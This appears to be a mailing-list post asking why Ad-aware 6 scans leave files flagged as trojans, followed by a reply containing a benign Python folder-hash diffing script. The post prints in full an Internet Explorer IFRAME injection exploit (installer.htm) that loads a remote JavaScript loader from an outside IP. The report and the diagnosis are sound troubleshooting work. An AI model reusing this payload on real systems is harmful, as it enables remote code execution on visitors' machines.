
Unusual Activity in Ad-aware 6 Personal, Build 6.181



Sorry about my previous post, Norton picked up the HTML code and filtered my
e-mail. Here is the original post without the HTML flags.

Hello,

My apologies if I am posting to the wrong list, but I am not sure if this is
a known issue in Ad-aware or if this even is an issue with Ad-aware.

I have written a script to run ad-aware to scan the registry and files from
Windows XP Scheduled tasks:

rem Scan the local registry
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" +c +1 +A

rem Scan the file system:
"C:\Program Files\Lavasoft\Ad-Aware 6\Ad-Aware.exe" C:\ +a +1 +A

Seems benign enough. Every night when it runs, after the first scan of the
registry, it creates four files in the C:\Program Files\Lavasoft\Ad-Aware
6\cache folder which Norton AV catches as trojan scripts:

exploit.chm
installer.htm
shellscript.js
shellscript_loader.js

In installer.htm, it appears to use one of the IE IFRAME exploits to
download the JavaScript files.

cat installer.htm

<script language="Javascript">

    function InjectedDuringRedirection(){
        showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="javascript:'<SCRIPT SRC=\\'http://62.131.86.111/security/idiots/repro/shellscript_loader.js\\'><\/script>'";
    }

</script>

<script language="javascript">

    setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
    setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
    document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" WIDTH=200 HEIGHT=200></IFRAME>');

</script>


The most unusual part is that it happens at the end of the registry scan in
Ad-aware. A Google search doesn't turn up any relation between this exploit
and Ad-aware, so it could be something unique to my system, but at this point
I am at a loss as to what it could be.

I also have an 'image' of my Windows XP Pro install in VMware where I have
been testing SP2, and the files exist there as well.

Any info would be appreciated.

Thanks,
Matt
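The post above is trying to work out which step of the nightly scan drops the four files into the Ad-aware cache folder. A simple way to pin that down is to snapshot the folder (path plus SHA-256 of every file) before and after each scan command and diff the two snapshots, so the files can be tied to the exact command that created them and their hashes can be compared with what the AV flagged. The script below is an added example written for this reply, not Matt's batch file and not anything shipped with Ad-aware; it is Python rather than a batch file so the diff logic is easy to read, and the demo at the bottom builds a temporary folder with four constructed placeholder files carrying the names from the post (their contents are harmless dummy bytes, not the real files).

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path):
    """Hash one file in chunks so large cache files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(directory):
    """Return {relative path: sha256} for every regular file under directory."""
    root = Path(directory)
    return {
        str(p.relative_to(root)): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_snapshots(before, after):
    """Split two snapshots into files that were added, removed, or changed in content."""
    added = {name: after[name] for name in after if name not in before}
    removed = {name: before[name] for name in before if name not in after}
    changed = {
        name: (before[name], after[name])
        for name in after
        if name in before and before[name] != after[name]
    }
    return added, removed, changed


def format_report(added, removed, changed):
    """Render the diff as text suitable for a scheduled-task log file."""
    lines = []
    for name, digest in sorted(added.items()):
        lines.append(f"ADDED    {name}  sha256={digest}")
    for name, digest in sorted(removed.items()):
        lines.append(f"REMOVED  {name}  sha256={digest}")
    for name, (old, new) in sorted(changed.items()):
        lines.append(f"CHANGED  {name}  {old[:12]}.. -> {new[:12]}..")
    return "\n".join(lines) if lines else "no changes"


def demo():
    """Constructed demonstration: a fake cache folder before and after a 'scan'.

    Assumption: in real use you would call snapshot() on the Ad-aware cache
    folder before each Ad-Aware.exe command in the scheduled task and again
    after it, instead of creating files yourself as this demo does.
    """
    with tempfile.TemporaryDirectory() as cache_dir:
        cache = Path(cache_dir)
        # One pre-existing file so the diff has something to leave alone.
        (cache / "existing.dat").write_bytes(b"unchanged placeholder")
        before = snapshot(cache)

        # Constructed placeholders named like the files in the post; the bytes
        # are dummy text, not the contents of the real files.
        for name in ("exploit.chm", "installer.htm",
                     "shellscript.js", "shellscript_loader.js"):
            (cache / name).write_bytes(b"placeholder content for " + name.encode())

        after = snapshot(cache)
        added, removed, changed = diff_snapshots(before, after)
        return added, removed, changed, format_report(added, removed, changed)


if __name__ == "__main__":
    print(demo()[3])
```

Running it once per scan command (registry scan, then file-system scan) tells you which of the two commands produces the files; if the same four names and hashes appear on every run and on the VMware image as well, that points at something the scanner writes deliberately rather than an infection that varies per machine, which is the distinction the post is trying to draw.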